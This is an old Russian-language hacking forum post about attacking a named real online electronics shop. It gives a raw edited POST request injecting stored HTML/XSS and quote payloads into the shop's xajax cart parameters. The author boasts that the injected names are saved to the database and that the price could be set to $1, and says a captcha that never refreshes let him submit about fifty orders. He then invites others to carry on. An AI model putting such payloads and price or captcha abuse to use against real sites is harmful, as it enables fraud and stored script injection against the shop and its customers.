29.03.2008, 11:50
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
XSS
хз как я это сделал, я так нелюблю в аяксе копаться поэтому запросы редактировал
Код:
POST http://green-leaf.ru/1/data/188.php HTTP/1.0
Method: POST http://green-leaf.ru/1/data/188.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.26 (Windows NT 5.1; U; ru)
Host: green-leaf.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://green-leaf.ru/1/data/188.php
Cookie: prices_korzina=d80804d682988ec69ef6773be58b3044; Apache=86.106.217.37.377191206776053497
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 310
Content-Transfer-Encoding: binary
xajax=setDobInKorzina&xajaxr=120677663512'&xajaxargs[]=13366'&xajaxargs[]=<h1>Hello%20:)</h1>%20LG%20DGK774%20%D1%87%D0%B5%D1%80%D0%BD%D1%8B%D0%B9%20DVD%2BRW%2C%20DVD-R%2C%20-RW%2C%20MP3%2C%20JPEG%2C%20%D0%BA%D0%B0%D1%80%D0%B0%D0%BE%D0%BA%D0%B5&xajaxargs[]=<h1>O_o&xajaxargs[]=''%20%D0%BC%D0%B5%D1%81%20%D1%81%2F%D1%86
В базу так и добовляется с XSSными названиями, ппц, мне пришлют если я закажу домашний кинотеатр за 1$ 
=========================
http://green-leaf.ru/1/zakaz.php
Rfgnxf не обновляется, зажал enter он заказов 50 наверно отправил с 1 каптчи все приняты
Дальше давайте сами а я гамать иду 
Кстати почему все товары хранятся на http://www.ultracomp.ru/ 
Последний раз редактировалось Ponchik; 29.03.2008 в 12:05..
|
|
|